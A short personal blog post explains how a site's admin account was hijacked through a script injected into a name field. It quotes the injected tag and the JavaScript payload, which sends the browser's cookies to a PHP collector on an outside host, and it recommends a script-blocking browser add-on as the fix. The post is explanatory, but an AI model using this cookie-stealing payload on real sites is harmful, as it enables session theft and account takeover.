One of my friend came to me and told me he lost his admin user while he was browsing the web site. I was surprised because normally it does not happen. if that site was using asp.net :) its sad but true asp.net does not allow html inclusion in post data. anyway the hacker puts a script code into his name field like this:
src="http://inso.host.sk/sniffer/c.js"></script>
its not a big deal if you look the output of this script you will see this:
a=new/**/Image();a.src='http://inso.host.sk/sniffer/s.php?a='+escape(document.cookie);
at the end it stoles browser's cookie and send it to a php file. while the hacker browsing another url and see which fish got fall for a trick :) anyway today I made a research and found a solution to this situation:
https://addons.mozilla.org/en-US/firefox/addon/722
you should simply disable all js inclusions in the page except the domain. that will make your browser more secure.
Subscribe to:
Post Comments (Atom)
sony xperia 10 VI did not like the case
After iphone 16 I wanted to test an android and looks like sony xperia 10 VI is nice, which is 6.1 inches, but it was narrow and longer than...
-
if you have wl11 ejb server and in that environment generated ejb client and deploy to wl12 it will give you this exception java.lang.NoSu...
-
Yeni nesil hacker'lar: Edwin Pena | Olympos Security koptum okuyunca yazılımcılar ve pazarlamacılar bu kadar kısa ve özlü bir hikayeyle ...
-
I know its been a long time I have not write anything. because I have not learn or done any new things. I dont want to write regular meaning...
No comments:
Post a Comment